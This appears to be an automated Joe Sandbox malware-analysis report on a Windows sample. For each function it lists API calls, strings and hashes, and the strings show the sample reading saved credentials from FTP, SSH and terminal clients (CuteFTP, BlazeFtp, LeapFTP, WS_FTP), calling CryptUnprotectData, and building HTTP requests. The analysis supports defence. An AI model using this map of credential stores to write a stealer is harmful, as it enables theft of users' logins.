                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: PrivateProfileStringlstrlen$DirectoryWindowslstrcatlstrcpy
                                                • String ID: DEFDIR$DIR$WS_FTP$\Ipswitch$\Ipswitch\WS_FTP$\win.ini
                                                • API String ID: 2508676433-45949541
                                                • Opcode ID: 936baacf3040b1f673e2b536d3b0c0ba39795cdad37abdd808d2d64cf94abb45
                                                • Instruction ID: 1ad5851406937463fc4fdd25d104d768d2af762f2f9e7c483ba0ad0795fe615e
                                                • Opcode Fuzzy Hash: 936baacf3040b1f673e2b536d3b0c0ba39795cdad37abdd808d2d64cf94abb45
                                                • Instruction Fuzzy Hash: A8212671E80608BADB127A61CC43FDE3A299B54744F100077B758B51E3DBF99BD09A6C
                                                Function 0040E9F9 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 83registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040EA1C
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040EA50
                                                • GetPrivateProfileStringA.KERNEL32(Program,DataPath,00414847,?,00000104,00000000), ref: 0040EAD6
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040EB2F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocCloseEnumLocalOpenPrivateProfileString
                                                • String ID: DataPath$Path$Program$\PocoSystem.ini$accounts.ini
                                                • API String ID: 1343824468-2495907966
                                                • Opcode ID: 83f224f1632b9f4dce77d821230e8882deb379fc18da0ded7f5086493192e42a
                                                • Instruction ID: ac58ce0af485c97c10e38b57228944f3f3edc0c01af0d6674f8eb1bd57798e51
                                                • Opcode Fuzzy Hash: 83f224f1632b9f4dce77d821230e8882deb379fc18da0ded7f5086493192e42a
                                                • Instruction Fuzzy Hash: F1314A31940118BADF11BB91CC42FDD7ABAFF04704F10C4BAB554710E1DAB99AA1AF98
                                                Function 0040C823 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 101COMMON
                                                Download Yara Rule
                                                APIs
                                                • StrStrIA.SHLWAPI(00704138,BlazeFtp), ref: 0040C84A
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: 8Ap$BlazeFtp$LastAddress$LastPassword$LastPort$LastUser$Software\FlashPeak\BlazeFtp\Settings$\BlazeFtp$site.dat
                                                • API String ID: 1884169789-3555203199
                                                • Opcode ID: db345b47a3ff1753b2d8c2e669b22902a7c027d563b64b1cabd4c6f4a61ae0ba
                                                • Instruction ID: 2aaa60dbd0995c362339c6ee2767abb90b7bbf48d78d9c31007efe50a139024b
                                                • Opcode Fuzzy Hash: db345b47a3ff1753b2d8c2e669b22902a7c027d563b64b1cabd4c6f4a61ae0ba
                                                • Instruction Fuzzy Hash: DA311731940109BADF127BA1CC42FEE7E72AF80744F10863BB514351F1D7B99A919B8C
                                                Function 00407A7F Relevance: 15.1, APIs: 3, Strings: 7, Instructions: 100stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • StrStrA.SHLWAPI(00704138,unleap.exe), ref: 00407AB1
                                                • lstrlen.KERNEL32(unleap.exe,00000001,00704138,unleap.exe), ref: 00407ACA
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                • StrStrIA.SHLWAPI(00704458,leapftp,00704138,unleap.exe), ref: 00407B0E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: 8Ap$SOFTWARE\LeapWare$XDp$leapftp$sites.dat$sites.ini$unleap.exe
                                                • API String ID: 1884169789-2350762770
                                                • Opcode ID: 5300ff160b27690eb6490a884dddbaa25e25ba5e465f0f872f45c6ffda6eae1a
                                                • Instruction ID: 386b857961e923e72b6bd9048734cec28c80f28d71c9641b52c3ac27aeea778a
                                                • Opcode Fuzzy Hash: 5300ff160b27690eb6490a884dddbaa25e25ba5e465f0f872f45c6ffda6eae1a
                                                • Instruction Fuzzy Hash: 0C217571A48104BDEF113B22CC02FEE7E1ADB81748F244437B905B51E2C7BDAB91969D
                                                Function 004053C3 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 69COMMON
                                                Download Yara Rule
                                                APIs
                                                • StrStrIA.SHLWAPI(00704138,CUTEFTP), ref: 004053EA
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                • CUTEFTP, xrefs: 004053E4
                                                • Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar, xrefs: 00405461
                                                • Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar, xrefs: 0040546E
                                                • Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar, xrefs: 00405454
                                                • \sm.dat, xrefs: 004053FE
                                                • Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar, xrefs: 00405488
                                                • Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar, xrefs: 00405447
                                                • Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar, xrefs: 0040547B
                                                • 8Ap, xrefs: 004053D9
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: 8Ap$CUTEFTP$Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar$\sm.dat
                                                • API String ID: 1884169789-1015284258
                                                • Opcode ID: f848c49cb20d6f1ba6bb938085becd1c3ada2ade320e3e777dafe4c2c13884a6
                                                • Instruction ID: d288d778f3b0420d84bf39ae9e8e3b7741dd64c7b166df527bd21b083190309a
                                                • Opcode Fuzzy Hash: f848c49cb20d6f1ba6bb938085becd1c3ada2ade320e3e777dafe4c2c13884a6
                                                • Instruction Fuzzy Hash: 6011F174550A04BADF123F21CC02FDE3E61EB91785F10413AB9087C0E6DBB98A919E9C
                                                Function 004063FD Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 140registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 00406413
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406447
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406655
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: Host$Port$PthR$SSH$User
                                                • API String ID: 1332880857-1643752846
                                                • Opcode ID: eaa43c735e61ffae52a0724ed8d73509e0147b303295c0cc199b6b0920578524
                                                • Instruction ID: 7c2f2a94b444b1cf8be7c0a3922bf6908aa52d237082ff0e2c71ec8c1971a0d3
                                                • Opcode Fuzzy Hash: eaa43c735e61ffae52a0724ed8d73509e0147b303295c0cc199b6b0920578524
                                                • Instruction Fuzzy Hash: 5751E43194011CFADF22AB51CC42BED7AB9BF44304F10C5BAB549750F1CB7A5AA1AF88
                                                Function 00405F4C Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 121registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 00405F62
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405F96
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406142
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumFreeLocalOpen
                                                • String ID: HostAdrs$Password$Port$RemoteDir$UserName
                                                • API String ID: 3369285772-3748300950
                                                • Opcode ID: d7690aa36aaf3038fd9ab3ef6a271d107ad27d5cc431ff49c380d1cb06a03a2d
                                                • Instruction ID: 2d9a8220eb6bbd75a2f462893fd11e2b037df868adfd8f9c06f9ac5482d37282
                                                • Opcode Fuzzy Hash: d7690aa36aaf3038fd9ab3ef6a271d107ad27d5cc431ff49c380d1cb06a03a2d
                                                • Instruction Fuzzy Hash: 0841053194011CEADF216B61CC42FDD7AB9BF44304F10C5BAB545780F1CB7A5AA1AF88
                                                Function 0040717C Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040718F
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004071C3
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407355
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: Directory$Password$Server$UserName$_Password
                                                • API String ID: 1332880857-3317168126
                                                • Opcode ID: f784e81f36cec8e00173612c35758048f3bf7a362356c001bceb032e7113f761
                                                • Instruction ID: 54a0982324a7ff5f3bc78d2f041cd7ab304232967b033089dd6db8ff381706e5
                                                • Opcode Fuzzy Hash: f784e81f36cec8e00173612c35758048f3bf7a362356c001bceb032e7113f761
                                                • Instruction Fuzzy Hash: 3B41D33184011CBADF226F51CC42BDDBABABF04344F14C1BAB958741B1DB7A5B91AF89
                                                Function 0040D9FA Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DA0D
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DA41
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DBD5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: HostName$Password$PortNumber$TerminalType$UserName
                                                • API String ID: 1332880857-1017491782
                                                • Opcode ID: a97c3551761ab576360c1733eecc6b1ed4fb1eb76d21ae7fa70193826fa21feb
                                                • Instruction ID: 5f0e69666c37055548565fce8565ad50753ab55e3f11aef87143afabb8110fab
                                                • Opcode Fuzzy Hash: a97c3551761ab576360c1733eecc6b1ed4fb1eb76d21ae7fa70193826fa21feb
                                                • Instruction Fuzzy Hash: 8B41A471950118BADF226F51CC02FDD7ABAFF04344F1085BAB548750B1DF7A9AA1AF88
                                                Function 004073A7 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004073BA
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004073EE
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407580
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: FtpDirectory$FtpPassword$FtpServer$FtpUserName$_FtpPassword
                                                • API String ID: 1332880857-980612798
                                                • Opcode ID: 8956f69495560f0236d72ba959e1200abbbda80525f791290559b36f63a50936
                                                • Instruction ID: f08fa55c07ec5e6899d33725599ea259e95770034ce1eb7242ec538371f35ae2
                                                • Opcode Fuzzy Hash: 8956f69495560f0236d72ba959e1200abbbda80525f791290559b36f63a50936
                                                • Instruction Fuzzy Hash: CC41A33194011CBADF216F51CC42BDD7ABABF04344F14C1BAB958740B1DB7A5B91AF89
                                                Function 004061E4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 112registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 004061FA
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040622E
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004063C3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: HostDirName$HostName$Password$Port$Username
                                                • API String ID: 1332880857-791697221
                                                • Opcode ID: 75dff1af7ace7d20edb261f0ffcfdb632cd5398e4b556188232bdafb5e826155
                                                • Instruction ID: fc2fdb558613e9c2e8b18701f4f9e27659267ba30ef1847d2d636ab8c18341a6
                                                • Opcode Fuzzy Hash: 75dff1af7ace7d20edb261f0ffcfdb632cd5398e4b556188232bdafb5e826155
                                                • Instruction Fuzzy Hash: D641C33594011CBADF227B61CC42BDC7ABABF44344F10C5BAB554740F1DB7A5AA1AF88
                                                Function 00403BFF Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 112networkstringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                • InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403C6B
                                                • InternetCreateUrlA.WININET(0000003C,80000000,?,00001FFF), ref: 00403C96
                                                • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00403CDC
                                                • wsprintfA.USER32 ref: 00403CFB
                                                • lstrlen.KERNEL32(?,00002000,00002000), ref: 00403D1E
                                                • closesocket.WSOCK32(?,?,00002000,00002000), ref: 00403D48
                                                Strings
                                                • <, xrefs: 00403CB6
                                                • GET %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98), xrefs: 00403CF3
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Internet$Crack$AllocCreateLocalclosesocketlstrlenwsprintf
                                                • String ID: <$GET %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                                                • API String ID: 4072649068-555445111
                                                • Opcode ID: 3f96f25970a9cb78f0a72576753725d6d5e8434e532fb2d3df5874f5cf6f9e74
                                                • Instruction ID: 2c93f55174f4879a4db6f1b7e4dd790b8fca9e33e28acec0cc160ac5bd5080f0
                                                • Opcode Fuzzy Hash: 3f96f25970a9cb78f0a72576753725d6d5e8434e532fb2d3df5874f5cf6f9e74
                                                • Instruction Fuzzy Hash: 7041F672D04209EAEF11AFA1CC41BEDBEBAFF04305F10403AF510B52A1D7B95A569B19
                                                Function 0040D5C0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 108registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 0040D5D6
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D60A
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D78D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: Host$Pass$Port$Remote Dir$User
                                                • API String ID: 1332880857-1775099961
                                                • Opcode ID: e3b8277ea445dba6ecad5caea65b513791af677e3a9d3ec25f9ab8ca92b39103
                                                • Instruction ID: 1fd05541a01a89dffe010ef35692abe6d580daf26f61a96ca8e157ebfd96a9e0
                                                • Opcode Fuzzy Hash: e3b8277ea445dba6ecad5caea65b513791af677e3a9d3ec25f9ab8ca92b39103
                                                • Instruction Fuzzy Hash: 0641F435940118BADF227B61CD02FDC7ABABF44304F10C5B6B548740B1DB7A5A91AF98
                                                Function 00406D4F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 121registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 00406D65
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406D99
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406F3A
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumFreeLocalOpen
                                                • String ID: Hostname$Password$Port$Username
                                                • API String ID: 3369285772-1811172798
                                                • Opcode ID: 035f185df59fc27ebd3775c18aca3fe776ca7ca7159decbd5d11012ba60ec3cc
                                                • Instruction ID: 500b27a2afeee4adcaf2e15fb58aabb2ec7cde25314abd0c379f5f2d99b47613
                                                • Opcode Fuzzy Hash: 035f185df59fc27ebd3775c18aca3fe776ca7ca7159decbd5d11012ba60ec3cc
                                                • Instruction Fuzzy Hash: 6041043590011CEADF216B61CC02BEDBAB9BF44304F10C5BAB149740F1DB7A5BA1AF99
                                                Function 00406B1B Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 110registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 00406B31
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406B65
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406CDA
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumFreeLocalOpen
                                                • String ID: FtpPort$Password$Server$Username
                                                • API String ID: 3369285772-1828875246
                                                • Opcode ID: 11ec69e3b8bca25b19c4894569c200eb6956258e517c22f75082e01047b38843
                                                • Instruction ID: 7ba9846cf84e593e36bc471b668ef0c5a307549365de809292626744771520ce
                                                • Opcode Fuzzy Hash: 11ec69e3b8bca25b19c4894569c200eb6956258e517c22f75082e01047b38843
                                                • Instruction Fuzzy Hash: BE41F43194011CEADF21AB61CC02BDD7AB9FF44304F10C5BAB549740F1DB795AA1AF98
                                                Function 0040E237 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 97registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E247
                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?,?,?), ref: 0040E377
                                                  • Part of subcall function 004043DC: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 00404428
                                                  • Part of subcall function 004043DC: LocalFree.KERNEL32(00000000), ref: 0040445C
                                                  • Part of subcall function 004015CB: lstrlen.KERNEL32(00000000), ref: 004015D7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCryptDataFreeLocalOpenUnprotectlstrlen
                                                • String ID: Folder$Port$Site$UserID$xflags
                                                • API String ID: 2167297517-269738940
